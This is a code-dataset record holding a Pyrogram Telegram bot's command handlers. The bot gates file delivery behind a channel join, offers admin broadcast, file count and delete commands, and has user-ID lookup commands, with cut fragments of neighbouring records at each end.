{"api_name": "imdb_api.views.genre_serializer_view.GenresView.as_view", "line_number": 66, "usage_type": "call"}, {"api_name": "imdb_api.views.genre_serializer_view.GenresView", "line_number": 66, "usage_type": "name"}]} +{"seq_id": "70772349287", "text": "import os\nimport time\nimport random\nimport logging\nfrom pyrogram import Client, filters\nfrom pyrogram.types import InlineKeyboardButton, InlineKeyboardMarkup\nfrom info import START_MSG, CHANNELS, ADMINS, AUTH_CHANNEL, CUSTOM_FILE_CAPTION\nfrom utils import Media, get_file_details\nfrom pyrogram.errors import UserNotParticipant\nfrom db.mongo import insert, getid\nlogger = logging.getLogger(__name__)\n\nPHOTO = [\n \"https://telegra.ph/file/d053a8e9ef4ed93df38a0.jpg\",\n \"https://telegra.ph/file/d1c6ee6d32e142f3674ed.jpg\", \n \"https://telegra.ph/file/8fd7710ee17bd34a963a5.jpg\", \n \"https://telegra.ph/file/ecb7510e187f0e3b60852.jpg\", \n \"https://telegra.ph/file/ef7f1cbc33ac9ee47578d.jpg\", \n \"https://telegra.ph/file/a5ce5774734d8c119c630.jpg\"\n]\n\n@Client.on_message(filters.private & filters.user(ADMINS) & filters.command([\"broadcast\"]))\nasync def 
broadcast(bot, message):\n if (message.reply_to_message):\n ms = await message.reply_text(\"Geting All ids from database ...........\")\n ids = getid()\n tot = len(ids)\n await ms.edit(f\"Starting Broadcast .... \\n Sending Message To {tot} Users\")\n for id in ids:\n try:\n \tawait message.reply_to_message.copy(id)\n except:\n \tpass\n\n\n@Client.on_message(filters.command(\"start\"))\nasync def start(bot, cmd):\n usr_cmdall1 = cmd.text\n if usr_cmdall1.startswith(\"/start subinps\"):\n if AUTH_CHANNEL:\n invite_link = await bot.create_chat_invite_link(int(AUTH_CHANNEL))\n try:\n user = await bot.get_chat_member(int(AUTH_CHANNEL), cmd.from_user.id)\n if user.status == \"kicked\":\n await bot.send_message(\n chat_id=cmd.from_user.id,\n text=\"Sorry Sir, You are Banned to use me.\",\n parse_mode=\"markdown\",\n disable_web_page_preview=True\n )\n return\n except UserNotParticipant:\n ident, file_id = cmd.text.split(\"_-_-_-_\")\n await bot.send_photo(\n chat_id=cmd.from_user.id,\n photo=f\"{random.choice(PHOTO)}\",\n caption=\"** 🔊 𝗝𝗼𝗶𝗻 𝗢𝘂𝗿 𝗰𝗵𝗮𝗻𝗻𝗲𝗹 🤭\\n\\n🔊 ഞങ്ങളുടെ 𝙈𝙖𝙞𝙣 𝘾𝙝𝙖𝙣𝙣𝙚𝙡 ജോയിൻ ചെയ്താൽ മാത്രമേ സിനിമ ലഭിക്കുകയുള്ളൂ.... 😁\\n\\nJoin ചെയ്ത ശേഷം Try Again ബട്ടൺ ക്ലിക്ക് ചെയ്യൂ.😁 **\",\n reply_markup=InlineKeyboardMarkup(\n [\n [\n InlineKeyboardButton(\"💢 JOIN OUR CHANNEL 💢\", url=invite_link.invite_link)\n ],\n [\n InlineKeyboardButton(\" 🔄 Try Again\", callback_data=f\"checksub#{file_id}\")\n ]\n ]\n ),\n parse_mode=\"markdown\"\n )\n return\n except Exception:\n await bot.send_message(\n chat_id=cmd.from_user.id,\n text=\"Something went Wrong.\",\n parse_mode=\"markdown\",\n disable_web_page_preview=True\n )\n return\n try:\n ident, file_id = cmd.text.split(\"_-_-_-_\")\n filedetails = await get_file_details(file_id)\n for files in filedetails:\n title = files.file_name\n size=files.file_size\n f_caption=files.caption\n if CUSTOM_FILE_CAPTION:\n try:\n f_caption=CUSTOM_FILE_CAPTION.format(file_name=title, file_size=size, file_caption=f_caption)\n except Exception as e:\n print(e)\n f_caption=f_caption\n if f_caption is None:\n f_caption = f\"{files.file_name}\"\n user_id = int(cmd.from_user.id)\n insert(user_id)\n buttons = [\n [\n InlineKeyboardButton('💢 Join Channel 💢', url='https://t.me/cinemacollections')\n ]]\n await bot.send_cached_media(\n chat_id=cmd.from_user.id,\n file_id=file_id,\n caption=f_caption,\n reply_markup=InlineKeyboardMarkup(buttons)\n )\n except Exception as err:\n await cmd.reply_text(f\"Something went wrong!\\n\\n**Error:** `{err}`\")\n elif len(cmd.command) > 1 and cmd.command[1] == 'subscribe':\n invite_link = await bot.create_chat_invite_link(int(AUTH_CHANNEL))\n await bot.send_photo(\n chat_id=cmd.from_user.id,\n photo=f\"{random.choice(PHOTO)}\",\n caption=\"**Please Join My Updates Channel to use this Bot!**\",\n reply_markup=InlineKeyboardMarkup(\n [\n [\n InlineKeyboardButton(\"💢 Join Channel 💢\", url=invite_link.invite_link)\n ]\n ]\n )\n )\n else:\n await cmd.reply_photo(\n photo=f\"{random.choice(PHOTO)}\",\n caption=START_MSG,\n reply_markup=InlineKeyboardMarkup(\n [\n [\n InlineKeyboardButton('❔ How To Use Me ❔', url='https://t.me/movieReqGroup1')\n ],[ \n InlineKeyboardButton(\"Sᴇᴀʀᴄʜ Hᴇʀᴇ 🔎\", switch_inline_query_current_chat=''),\n InlineKeyboardButton(\"Group 🗯\", url='https://t.me/movieReqGroup1')\n ],\n [\n InlineKeyboardButton('Dev👩‍💻', url='https://t.me/DhashamoolamDhamu'),\n InlineKeyboardButton(\"About💡\", callback_data=\"about\")\n ],\n [ InlineKeyboardButton('➕ Add Me To Your Group ', url='https://t.me/Anjalina_bot?startgroup=true'),]\n 
]\n )\n )\n\n\n@Client.on_message(filters.command('channel') & filters.user(ADMINS))\nasync def channel_info(bot, message):\n \"\"\"Send basic information of channel\"\"\"\n if isinstance(CHANNELS, (int, str)):\n channels = [CHANNELS]\n elif isinstance(CHANNELS, list):\n channels = CHANNELS\n else:\n raise ValueError(\"Unexpected type of CHANNELS\")\n\n text = '📑 **Indexed channels/groups**\\n'\n for channel in channels:\n chat = await bot.get_chat(channel)\n if chat.username:\n text += '\\n@' + chat.username\n else:\n text += '\\n' + chat.title or chat.first_name\n\n text += f'\\n\\n**Total:** {len(CHANNELS)}'\n\n if len(text) < 4096:\n await message.reply(text)\n else:\n file = 'Indexed channels.txt'\n with open(file, 'w') as f:\n f.write(text)\n await message.reply_document(file)\n os.remove(file)\n\n\n@Client.on_message(filters.command('total') & filters.user(ADMINS))\nasync def total(bot, message):\n \"\"\"Show total files in database\"\"\"\n msg = await message.reply(\"Processing...⏳\", quote=True)\n try:\n total = await Media.count_documents()\n await msg.edit(f'📁 Saved files: {total}')\n except Exception as e:\n logger.exception('Failed to check total files')\n await msg.edit(f'Error: {e}')\n\n\n@Client.on_message(filters.command('logger') & filters.user(ADMINS))\nasync def log_file(bot, message):\n \"\"\"Send log file\"\"\"\n try:\n await message.reply_document('TelegramBot.log')\n except Exception as e:\n await message.reply(str(e))\n\n\n@Client.on_message(filters.command('delete') & filters.user(ADMINS))\nasync def delete(bot, message):\n \"\"\"Delete file from database\"\"\"\n reply = message.reply_to_message\n if reply and reply.media:\n msg = await message.reply(\"Processing...⏳\", quote=True)\n else:\n await message.reply('Reply to file with /delete which you want to delete', quote=True)\n return\n\n for file_type in (\"document\", \"video\", \"audio\"):\n media = getattr(reply, file_type, None)\n if media is not None:\n break\n else:\n await msg.edit('This is not supported file format')\n return\n\n result = await Media.collection.delete_one({\n 'file_name': media.file_name,\n 'file_size': media.file_size,\n 'mime_type': media.mime_type\n })\n if result.deleted_count:\n await msg.edit('File is successfully deleted from database')\n else:\n await msg.edit('File not found in database')\n@Client.on_message(filters.command('about'))\nasync def bot_info(bot, message):\n buttons = [\n [\n InlineKeyboardButton('💢 Channel 💢', url='https://t.me/cinemacollections'),\n InlineKeyboardButton('🗯 Group 🗯', url='https://t.me/movieReqGroup1')\n ]\n ]\n await message.reply(text=\"Developer : Aɴᴊᴀʟɪɴᴀ\\nCode : Ɗнαѕнαмσσℓαм\\nLanguage : Python3\\nLibrary : Pyrogram asyncio\\nSource Code : Cʟɪᴄᴋ Mᴇ\\nCʜᴀɴɴᴇʟ : Channel \", reply_markup=InlineKeyboardMarkup(buttons), disable_web_page_preview=True)\n\n@Client.on_message(filters.command('help'))\nasync def bot_info(bot, message):\n buttons = [\n [\n InlineKeyboardButton('💢 Channel 💢', url='https://t.me/Cinemacollections'),\n InlineKeyboardButton('🗯 Group 🗯', url='https://t.me/movieReqGroup1')\n ]\n ]\n await message.reply(text=\"\"\"🙋🏻‍♂️ Hellooo {user_name} 🤓\n \n▶️ ꜱᴇɴᴅ ᴛʜᴇ ᴄᴏʀʀᴇᴄᴛ ɴᴀᴍᴇ ᴏꜰ мovιᴇ ꜱᴇʀɪᴇꜱ ( ᴜꜱᴇ ɢᴏᴏɢʟᴇ.ᴄᴏᴍ ᴛᴏ ɢᴇᴛ ᴄᴏʀʀᴇᴄᴛ ɴᴀᴍᴇ ! ) .\n\n▫️ Exᴀᴍᴘʟᴇ 1 : Lᴜᴄɪꜰᴇʀ\n▫️ Exᴀᴍᴘʟᴇ 2 : Lᴜᴄɪꜰᴇʀ мᴀʟᴀʏᴀʟᴀм\n▫️ Exᴀᴍᴘʟᴇ 1 : Lᴜᴄɪꜰᴇʀ 2021\n\n🔺 ɪꜰ ʏᴏᴜ ᴄᴀɴᴛ ꜰɪɴᴅ ᴛʜᴇ мovιᴇ ᴛʜᴀᴛ ʏᴏᴜ ʟᴏᴏᴋɪɴɢ ꜰᴏʀ. 
ᴛʜᴇɴ ʏᴏᴜ ᴄᴀɴ ꜱᴇɴᴅ ᴀ ᴍᴇꜱꜱᴀɢᴇ ᴛᴏ Dᴇᴠ\"\"\", reply_markup=InlineKeyboardMarkup(buttons), disable_web_page_preview=True)\n\n@Client.on_message(filters.command('info') & (filters.private | filters.group))\nasync def showinfo(client, message):\n try:\n cmd, id = message.text.split(\" \", 1)\n except:\n id = False\n pass\n\n if id:\n if (len(id) == 10 or len(id) == 9):\n try:\n checkid = int(id)\n except:\n await message.reply_text(\"__Enter a valid USER ID__\", quote=True, parse_mode=\"md\")\n return\n else:\n await message.reply_text(\"__Enter a valid USER ID__\", quote=True, parse_mode=\"md\")\n return \n\n if Config.SAVE_USER == \"yes\":\n name, username, dcid = await find_user(str(id))\n else:\n try:\n user = await client.get_users(int(id))\n name = str(user.first_name + (user.last_name or \"\"))\n username = user.username\n dcid = user.dc_id\n except:\n name = False\n pass\n\n if not name:\n await message.reply_text(\"__USER Details not found!!__\", quote=True, parse_mode=\"md\")\n return\n else:\n if message.reply_to_message:\n name = str(message.reply_to_message.from_user.first_name\\\n + (message.reply_to_message.from_user.last_name or \"\"))\n id = message.reply_to_message.from_user.id\n username = message.reply_to_message.from_user.username\n dcid = message.reply_to_message.from_user.dc_id\n else:\n name = str(message.from_user.first_name\\\n + (message.from_user.last_name or \"\"))\n id = message.from_user.id\n username = message.from_user.username\n dcid = message.from_user.dc_id\n \n if not str(username) == \"None\":\n user_name = f\"@{username}\"\n else:\n user_name = \"none\"\n\n await message.reply_text(\n f\"UserInfo\\n\\n\"\n f\"Name : {name}\\n\"\n f\"UserID : {id}\\n\"\n f\"Username Name : {user_name}\\n\"\n f\"Permanant USER Link : Link ❗️\\n\\n\"\n f\"@MovieReqGroup1\",\n quote=True,\n parse_mode=\"html\"\n )\n\n@Client.on_message(filters.command('id') & (filters.private | filters.group))\nasync def showid(client, message):\n chat_type = message.chat.type\n\n if chat_type == \"private\":\n user_id = message.chat.id\n await message.reply_text(\n f\"Your ID : `{user_id}`\",\n parse_mode=\"md\",\n quote=True\n )\n elif (chat_type == \"group\") or (chat_type == \"supergroup\"):\n user_id = message.from_user.id\n chat_id = message.chat.id\n if message.reply_to_message:\n reply_id = f\"Replied User ID : `{message.reply_to_message.from_user.id}`\"\n else:\n reply_id = \"\"\n await message.reply_text(\n f\"Your ID : `{user_id}`\\nThis Group ID : `{chat_id}`\\n\\n{reply_id}\",\n parse_mode=\"md\",\n quote=True\n ) \n\n", "repo_name": "ccadmin1/anjalina-Imdb", "sub_path": "plugins/commands.py", "file_name": "commands.py", "file_ext": "py", "file_size_in_byte": 13905, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "53", "api": [{"api_name": "logging.getLogger", "line_number": 11, "usage_type": "call"}, {"api_name": "db.mongo.getid", "line_number": 26, "usage_type": "call"}, {"api_name": "pyrogram.Client.on_message", "line_number": 22, "usage_type": "call"}, {"api_name": "pyrogram.Client", "line_number": 22, "usage_type": "name"}, {"api_name": "pyrogram.filters.private", "line_number": 22, "usage_type": "attribute"}, {"api_name": "pyrogram.filters", "line_number": 22, "usage_type": "name"}, {"api_name": "pyrogram.filters.user", "line_number": 22, "usage_type": "call"}, {"api_name": "info.ADMINS", "line_number": 22, "usage_type": "argument"}, {"api_name": "pyrogram.filters.command", "line_number": 22, "usage_type": "call"}, 
{"api_name": "info.AUTH_CHANNEL", "line_number": 40, "usage_type": "name"}, {"api_name": "info.AUTH_CHANNEL", "line_number": 41, "usage_type": "argument"}, {"api_name": "info.AUTH_CHANNEL", "line_number": 43, "usage_type": "argument"}, {"api_name": "pyrogram.errors.UserNotParticipant", "line_number": 52, "usage_type": "name"}, {"api_name": "random.choice", "line_number": 56, "usage_type": "call"}, {"api_name": "pyrogram.types.InlineKeyboardMarkup", "line_number": 58, "usage_type": "call"}, {"api_name": "pyrogram.types.InlineKeyboardButton", "line_number": 61, "usage_type": "call"}, {"api_name": "pyrogram.types.InlineKeyboardButton", "line_number": 64, "usage_type": "call"}, {"api_name": "utils.get_file_details", "line_number": 81, "usage_type": "call"}, {"api_name": "info.CUSTOM_FILE_CAPTION", "line_number": 86, "usage_type": "name"}, {"api_name": "info.CUSTOM_FILE_CAPTION.format", "line_number": 88, "usage_type": "call"}, {"api_name": "info.CUSTOM_FILE_CAPTION", "line_number": 88, "usage_type": "name"}, {"api_name": "db.mongo.insert", "line_number": 95, "usage_type": "call"}, {"api_name": "pyrogram.types.InlineKeyboardButton", "line_number": 98, "usage_type": "call"}, {"api_name": "pyrogram.types.InlineKeyboardMarkup", "line_number": 104, "usage_type": "call"}, {"api_name": "info.AUTH_CHANNEL", "line_number": 109, "usage_type": "argument"}, {"api_name": "random.choice", "line_number": 112, "usage_type": "call"}, {"api_name": "pyrogram.types.InlineKeyboardMarkup", "line_number": 114, "usage_type": "call"}, {"api_name": "pyrogram.types.InlineKeyboardButton", "line_number": 117, "usage_type": "call"}, {"api_name": "random.choice", "line_number": 124, "usage_type": "call"}, {"api_name": "info.START_MSG", "line_number": 125, "usage_type": "name"}, {"api_name": "pyrogram.types.InlineKeyboardMarkup", "line_number": 126, "usage_type": "call"}, {"api_name": "pyrogram.types.InlineKeyboardButton", "line_number": 129, "usage_type": "call"}, {"api_name": "pyrogram.types.InlineKeyboardButton", "line_number": 131, "usage_type": "call"}, {"api_name": "pyrogram.types.InlineKeyboardButton", "line_number": 132, "usage_type": "call"}, {"api_name": "pyrogram.types.InlineKeyboardButton", "line_number": 135, "usage_type": "call"}, {"api_name": "pyrogram.types.InlineKeyboardButton", "line_number": 136, "usage_type": "call"}, {"api_name": "pyrogram.types.InlineKeyboardButton", "line_number": 138, "usage_type": "call"}, {"api_name": "pyrogram.Client.on_message", "line_number": 36, "usage_type": "call"}, {"api_name": "pyrogram.Client", "line_number": 36, "usage_type": "name"}, {"api_name": "pyrogram.filters.command", "line_number": 36, "usage_type": "call"}, {"api_name": "pyrogram.filters", "line_number": 36, "usage_type": "name"}, {"api_name": "info.CHANNELS", "line_number": 147, "usage_type": "argument"}, {"api_name": "info.CHANNELS", "line_number": 148, "usage_type": "name"}, {"api_name": "info.CHANNELS", "line_number": 149, "usage_type": "argument"}, {"api_name": "info.CHANNELS", "line_number": 150, "usage_type": "name"}, {"api_name": "info.CHANNELS", "line_number": 162, "usage_type": "argument"}, {"api_name": "os.remove", "line_number": 171, "usage_type": "call"}, {"api_name": "pyrogram.Client.on_message", "line_number": 144, "usage_type": "call"}, {"api_name": "pyrogram.Client", "line_number": 144, "usage_type": "name"}, {"api_name": "pyrogram.filters.command", "line_number": 144, "usage_type": "call"}, {"api_name": "pyrogram.filters", "line_number": 144, "usage_type": "name"}, {"api_name": 
"pyrogram.filters.user", "line_number": 144, "usage_type": "call"}, {"api_name": "info.ADMINS", "line_number": 144, "usage_type": "argument"}, {"api_name": "utils.Media.count_documents", "line_number": 179, "usage_type": "call"}, {"api_name": "utils.Media", "line_number": 179, "usage_type": "name"}, {"api_name": "pyrogram.Client.on_message", "line_number": 174, "usage_type": "call"}, {"api_name": "pyrogram.Client", "line_number": 174, "usage_type": "name"}, {"api_name": "pyrogram.filters.command", "line_number": 174, "usage_type": "call"}, {"api_name": "pyrogram.filters", "line_number": 174, "usage_type": "name"}, {"api_name": "pyrogram.filters.user", "line_number": 174, "usage_type": "call"}, {"api_name": "info.ADMINS", "line_number": 174, "usage_type": "argument"}, {"api_name": "pyrogram.Client.on_message", "line_number": 186, "usage_type": "call"}, {"api_name": "pyrogram.Client", "line_number": 186, "usage_type": "name"}, {"api_name": "pyrogram.filters.command", "line_number": 186, "usage_type": "call"}, {"api_name": "pyrogram.filters", "line_number": 186, "usage_type": "name"}, {"api_name": "pyrogram.filters.user", "line_number": 186, "usage_type": "call"}, {"api_name": "info.ADMINS", "line_number": 186, "usage_type": "argument"}, {"api_name": "utils.Media.collection.delete_one", "line_number": 213, "usage_type": "call"}, {"api_name": "utils.Media.collection", "line_number": 213, "usage_type": "attribute"}, {"api_name": "utils.Media", "line_number": 213, "usage_type": "name"}, {"api_name": "pyrogram.Client.on_message", "line_number": 195, "usage_type": "call"}, {"api_name": "pyrogram.Client", "line_number": 195, "usage_type": "name"}, {"api_name": "pyrogram.filters.command", "line_number": 195, "usage_type": "call"}, {"api_name": "pyrogram.filters", "line_number": 195, "usage_type": "name"}, {"api_name": "pyrogram.filters.user", "line_number": 195, "usage_type": "call"}, {"api_name": "info.ADMINS", "line_number": 195, "usage_type": "argument"}, {"api_name": "pyrogram.types.InlineKeyboardButton", "line_number": 226, "usage_type": "call"}, {"api_name": "pyrogram.types.InlineKeyboardButton", "line_number": 227, "usage_type": "call"}, {"api_name": "pyrogram.types.InlineKeyboardMarkup", "line_number": 230, "usage_type": "call"}, {"api_name": "pyrogram.Client.on_message", "line_number": 222, "usage_type": "call"}, {"api_name": "pyrogram.Client", "line_number": 222, "usage_type": "name"}, {"api_name": "pyrogram.filters.command", "line_number": 222, "usage_type": "call"}, {"api_name": "pyrogram.filters", "line_number": 222, "usage_type": "name"}, {"api_name": "pyrogram.types.InlineKeyboardButton", "line_number": 236, "usage_type": "call"}, {"api_name": "pyrogram.types.InlineKeyboardButton", "line_number": 237, "usage_type": "call"}, {"api_name": "pyrogram.types.InlineKeyboardMarkup", "line_number": 248, "usage_type": "call"}, {"api_name": "pyrogram.Client.on_message", "line_number": 232, "usage_type": "call"}, {"api_name": "pyrogram.Client", "line_number": 232, "usage_type": "name"}, {"api_name": "pyrogram.filters.command", "line_number": 232, "usage_type": "call"}, {"api_name": "pyrogram.filters", "line_number": 232, "usage_type": "name"}, {"api_name": "pyrogram.Client.on_message", "line_number": 250, "usage_type": "call"}, {"api_name": "pyrogram.Client", "line_number": 250, "usage_type": "name"}, {"api_name": "pyrogram.filters.command", "line_number": 250, "usage_type": "call"}, {"api_name": "pyrogram.filters", "line_number": 250, "usage_type": "name"}, {"api_name": 
"pyrogram.filters.private", "line_number": 250, "usage_type": "attribute"}, {"api_name": "pyrogram.filters.group", "line_number": 250, "usage_type": "attribute"}, {"api_name": "pyrogram.Client.on_message", "line_number": 314, "usage_type": "call"}, {"api_name": "pyrogram.Client", "line_number": 314, "usage_type": "name"}, {"api_name": "pyrogram.filters.command", "line_number": 314, "usage_type": "call"}, {"api_name": "pyrogram.filters", "line_number": 314, "usage_type": "name"}, {"api_name": "pyrogram.filters.private", "line_number": 314, "usage_type": "attribute"}, {"api_name": "pyrogram.filters.group", "line_number": 314, "usage_type": "attribute"}]} +{"seq_id": "2437004195", "text": "from torch.utils.data import DataLoader\n\n\ndef create_dataloader(opt):\n \"\"\"\n 从opt参数中创建dataloader\n :param opt (